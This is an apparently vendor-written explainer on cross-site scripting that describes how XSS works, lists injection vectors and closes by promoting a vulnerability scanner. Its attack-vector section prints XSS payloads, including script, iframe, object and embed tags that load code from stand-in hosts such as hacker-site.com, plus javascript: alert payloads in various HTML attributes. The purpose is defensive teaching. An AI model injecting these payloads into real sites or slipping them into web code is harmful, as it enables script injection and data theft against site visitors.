Acunetix Vulnerability Scanner

Cross-site Scripting (XSS) Attack

What is Cross-site Scripting?

Hackers are constantly experimenting with a wide repertoire of hacking techniques to compromise websites and web applications and make off with a treasure trove of sensitive data including credit card numbers, social security numbers and even medical records.

Cross-site Scripting (also known as XSS or CSS) is generally believed to be one of the most common application layer hacking techniques.

In the pie-chart below, created by the Web Hacking Incident Database for 2011 (WHID) clearly shows that whilst many different attack methods exist, SQL injection and XSS are the most popular. To add to this, many other attack methods, such as Information Disclosures, Content Spoofing and Stolen Credentials could all be side-effects of an XSS attack.

In general, cross-site scripting refers to that hacking technique that leverages vulnerabilities in the code of a web application to allow an attacker to send malicious content from an end-user and collect some type of data from the victim.

Today, websites rely heavily on complex web applications to deliver different output or content to a wide variety of users according to set preferences and specific needs. This arms organizations with the ability to provide better value to their customers and prospects. However, dynamic websites suffer from serious vulnerabilities rendering organizations helpless and prone to Cross-site Scripting attacks on their data.

“A web page contains both text and HTML markup that is generated by the server and interpreted by the client browser. Web sites that generate only static pages are able to have full control over how the browser interprets these pages. Web sites that generate dynamic pages do not have complete control over how their outputs are interpreted by the client. The heart of the issue is that if mistrusted content can be introduced into a dynamic page, neither the web site nor the client has enough information to recognize that this has happened and take protective actions.” (CERT Coordination Center).

Cross-site Scripting allows an attacker to embed malicious JavaScript, VBScript, ActiveX, HTML, or Flash into a vulnerable dynamic page to fool the user, executing the script on his machine in order to gather data. The use of XSS might compromise private information, manipulate or steal cookies, create requests that can be mistaken for those of a valid user, or execute malicious code on the end-user systems. The data is usually formatted as a hyperlink containing malicious content and which is distributed over any possible means on the internet.

As a hacking tool, the attacker can formulate and distribute a custom-crafted CSS URL just by using a browser to test the dynamic website response. The attacker also needs to know some HTML, JavaScript and a dynamic language, to produce a URL which is not too suspicious-looking, in order to attack a XSS vulnerable website.

Any web page which passes parameters to a database can be vulnerable to this hacking technique. Usually these are present in Login forms, Forgot Password forms, etc…

Note — Often people refer to Cross-site Scripting as CSS or XSS, which is can be confused with Cascading Style Sheets (CSS).

The Theory of XSS

In a typical XSS attack the hacker infects a legitimate web page with his malicious client-side script. When a user visits this web page the script is downloaded to his browser and executed. There are many slight variations to this theme, however all XSS attacks follow this pattern, which is depicted in the diagram below.

As a web developer you are putting measures in place to secure the first step of the attack. You want to prevent the hacker from infecting your innocent web page with his malicious script. There are various ways to do that, and this article goes into some technical detail on the most important techniques that you must use to disable this sort of attack against your users.

XSS Attack Vectors

So how does a hacker infect your web page in the first place? You might think, that for an attacker to make changes to your web page he must first break the security of the web server and be able to upload and modify files on that server. Unfortunately for you an XSS attack is much easier than that.

Internet applications today are not static HTML pages. They are dynamic and filled with ever changing content. Modern web pages pull data from many different sources. This data is amalgamated with your own web page and can contain simple text, or images, and can also contain HTML tags such as <p> for paragraph, <img> for image and <script> for scripts. Many times the hacker will use the ‘comments’ feature of your web page to insert a comment that contains a script. Every user who views that comment will download the script which will execute on his browser, causing undesirable behaviour. Something as simple as a Facebook post on your wall can contain a malicious script, which if not filtered by the Facebook servers will be injected into your Wall and execute on the browser of every person who visits your Facebook profile.

By now you should be aware that any sort of data that can land on your web page from an external source has the potential of being infected with a malicious script, but in what form does the data come?

<script>

The <script> tag is the most popular way and sometimes easiest to detect. It can arrive to your page in the following forms.

External script

<script src=http://hacker-site.com/xss.js></script>

Embedded script

<script> alert(“XSS”); </script>

<body>

The <body> tag can contain an embedded script by using the onload event, as shown below:

<body onload=alert("XSS")>

The

background

attribute can be similarly exploited.

<body background="javascript:alert('XSS')">

<img>

Some browsers will execute a script when found in the <IMG> tag as shown below.

<img src="javascript:alert('XSS');">

There are some variations of this that work in some browsers.

<img dynsrc="javascript:alert('XSS')">

<img lowsrc="javascript:alert('XSS')">

<iframe>

The <iframe> tag allows you to import HTML into a page. This important HTML can contain a script.

<iframe src=”http://hacker-site.com/xss.html”>

<input>

If the type attribute of the <input> tag is set to image, it can be manipulated to embed a script.

<input type="image" src="javascript:alert('XSS');">

<link>

The <link> tag, which is often used to link to external style sheets could contain a script.

<link rel="stylesheet" href="javascript:alert('XSS');">

<table>

The background attribute of the table tag can be exploited to refer to a script instead of an image.

<table background="javascript:alert('XSS')">

The same applies to the <td> tag, used to separate cells inside a table.

<td background="javascript:alert('XSS')">

<div>

The <div> tag, similar to the <table> and <td> tags can also specify a background and therefore embed a script.

<div style="background-image: url(javascript:alert('XSS'))">

The <div> style attribute can also be manipulated in the following way:

<div style="width: expression(alert('XSS'));">

<object>

The <object> tag can be used to pull in a script from an external site in the following way:

<object type="text/x-scriptlet" data="http://hacker.com/xss.html">

<embed>

If the hacker places a malicious script inside a flash file, it can be injected in the following way:

<embed src="http://hacker.com/xss.swf" AllowScriptAccess="always">

Is your site vulnerable to Cross-site Scripting?

Our experience leads us to conclude that the cross-site scripting vulnerability is one of the most highly widespread flaw on the Internet and will occur anywhere a web application uses input from a user in the output it generates without validating it. Our own research shows that over a third of the organizations applying for our free audit service are vulnerable to Cross-site Scripting. And the trend is upward.

Example of a Cross-site Scripting Attack

As a simple example, imagine a search engine site which is open to an XSS attack. The query screen of the search engine is a simple single field form with a submit button. Whereas the results page, displays both the matched results and the text you are looking for.

Search Results for "XSS Vulnerability"

To be able to bookmark pages, search engines generally leave the entered variables in the URL address. In this case the URL would look like:

Upon loading the results page, the test search engine would probably display no results for the search but it will display a JavaScript alert which was injected into the page by using the XSS vulnerability.

How to Check for Cross-site Scripting Vulnerabilities

To check for Cross-site Scripting vulnerabilities, use a Web Vulnerability Scanner. A Web Vulnerability Scanner crawls your entire website and automatically checks for Cross-site Scripting vulnerabilities. It will indicate which URLs/scripts are vulnerable to these attacks so that you can fix the vulnerability easily. Besides Cross-site Scripting vulnerabilities a web application scanner will also check for SQL Injection & other web vulnerabilities.

To check whether your website has Cross-site Scripting vulnerabilities, download the Trial Edition of Acunetix WVS. This version will scan any website / web application for XSS vulnerabilities and it will also reveal all the essential information related to it, such as the vulnerability location and remediation techniques. Scanning for XSS is normally a quick exercise (depending on the size of the web-site).